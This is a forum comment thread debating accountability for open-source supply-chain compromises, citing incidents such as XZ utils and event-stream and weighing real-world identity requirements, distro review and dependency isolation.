upvote

points

by ting01 days ago |
comments
upvoteby post-it1 days ago|
next
[-]
> The threat of being forever tainted is enough to make people more cautious

No it's not. The blame game was very popular in the Eastern Block and it resulted in a stagnant society where lots of things went wrong anyway. For instance, Chernobyl.

reply
upvoteby KronisLV23 hours ago|
prev|
next
[-]
> What we need is accountability and ties to real-world identity.

Who's gonna enforce that?

> If you're compromised, you're burned forever in the ledger.

Guess we can't use XZ utils anymore cause Lasse Collin got pwned.

Also can't use Chalk, debug, ansi-styles, strip-ansi, supports-color, color-convert and others due to Josh Junon also ending up a victim.

Same with ua-parser-js and Faisal Salman.

Same with event-stream and Dominic Tarr.

Same with the 2018 ESLint hack.

Same with everyone affected by Shai-Hulud.

Hell, at that point some might go out of their way to get people they don't like burned.

At the same time, I think that stopping reliance on package managers that move fast and break things and instead making OS maintainers review every package and include them in distros would make more sense. Of course, that might also be absolutely insane (that's how you get an ecosystem that's from 2 months to 2 years behind the upstream packages) and take 10x more work, but with all of these compromises, I'd probably take that and old packages with security patches, instead of pulling random shit with npm or pip or whatever.

Though having some sort of a ledger of bad actors (instead of people who just fuck up) might also be nice, if a bit impossible to create - because in the current day world that's potentially every person that you don't know and can't validate is actually sending you patches (instead of someone impersonating them), or anyone with motivations that aren't clear to you, especially in the case of various "helpful" Jia Tans.

reply
upvoteby hannahoppla13 hours ago|
prev|
next
[-]
Accountability is on the people using a billion third party dependencies, you need to take responsibility for every line of code you use in your project.
reply
upvoteby encomiast12 hours ago|
parent|
[-]
If you are really talking about dependencies, I’m not sure you’ve really thought this all the way through. Are you inspecting every line of the Python interpreter and its dependencies before running? Are you reading the compiler that built the Python interpreter?
reply
upvoteby autoexec3 hours ago|
parent|
[-]
It's still smart to limit the amount of code (and coders) you have to trust. A large project like Python should be making sure it's dependencies are safe before each release. In our own projects we'd probably be better off taking just the code we need from a library, verifying it (at least to the extent of looking for something as suspect as a random block of base64 encoded data) and copying it into our projects directly rather than adding a ton of external dependencies and every last one of the dependencies they pull in and then just hoping that nobody anywhere in that chain gets compromised.
reply
upvoteby MetaWhirledPeas1 days ago|
prev|
next
[-]
> real-world identity

This bit sounds like dystopian governance, antithetical to most open source philosophies.

reply
upvoteby 2OEH8eoCRo01 days ago|
parent|
[-]
Would you drive on bridges or ride in elevators "inspected" by anons? Why are our standards for digital infrastructure and software "engineering" so low?

I don't blame the anons but the people blindly pulling in anon dependencies. The anons don't owe us anything.

reply
upvoteby pamcake16 hours ago|
parent|
next
[-]
A business or government can (should) separately package, review, and audit code without involving upstream developers or maintainers at all.
reply
upvoteby MetaWhirledPeas1 days ago|
parent|
prev|
next
[-]
This option is available already in the form of closed-source proprietary software.

If someone wants a package manager where all projects mandate verifiable ID that's fine, but I don't see that getting many contributors. And I also don't see that stopping people using fraudulent IDs.

reply
upvoteby mastermage23 hours ago|
parent|
prev|
[-]
Do you know who inspected a bridge before you drive over it?
reply
upvoteby anthk23 hours ago|
prev|
[-]
There is no need of that bullshit. Guix can just set an isolated container in seconds not touching your $HOME at all and importing all the Python/NPM/Whatever dependencies in the spot.
reply